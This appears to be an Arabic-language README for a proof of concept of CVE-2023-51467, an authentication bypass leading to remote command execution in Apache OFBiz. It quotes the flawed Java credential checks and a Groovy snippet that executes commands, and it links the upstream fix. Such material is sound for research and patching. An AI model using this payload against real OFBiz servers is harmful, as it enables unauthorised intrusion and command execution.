
CVE-2023-51467 POC
تم تغيير exp.py إلى تنفيذ الأوامر
استغلال الثغرات في التسلسل
اختبار تجاوز المصادقة
بسبب الاستخدام الخاطئ للقيمة الفارغة (null) أثناء التحقق من الهوية، لم تكن هذه الطريقة فعالة، مما أدى إلى تجاوز المصادقة.
if (username == null) username = (String) session.getAttribute("USERNAME");
if (password == null) password = (String) session.getAttribute("PASSWORD");
if (token == null) token = (String) session.getAttribute("TOKEN");
if (UtilValidate.isEmpty(username)) username = (String) session.getAttribute("USERNAME");
if (UtilValidate.isEmpty(password)) password = (String) session.getAttribute("PASSWORD");
if (UtilValidate.isEmpty(token)) token = (String) session.getAttribute("TOKEN");
حلل أحدهم تنفيذ الأوامر مباشرة، لكن هذا يتطلب تجاوز فلترة Groovy. أو إيجاد نقطة دخول أفضل للتنفيذ. rce.txt
def process = cmd.execute()
process.waitFor()
println "Exit code: ${process.exitValue()}"
println "Output:\n${process.text}"```
## المراجع
https://github.com/apache/ofbiz-framework/commit/47e7959065b82b170da5c330ed5c17af16415ede#diff-68decfd4946b8ef0adcc4c7f18b938aec4a07ff7ce64609a2691ba88a4688607
https://mp.weixin.qq.com/s/vdyqfm0FkbKp5W2LilhbXA
يُرجى عدم استخدامها لأغراض غير قانونية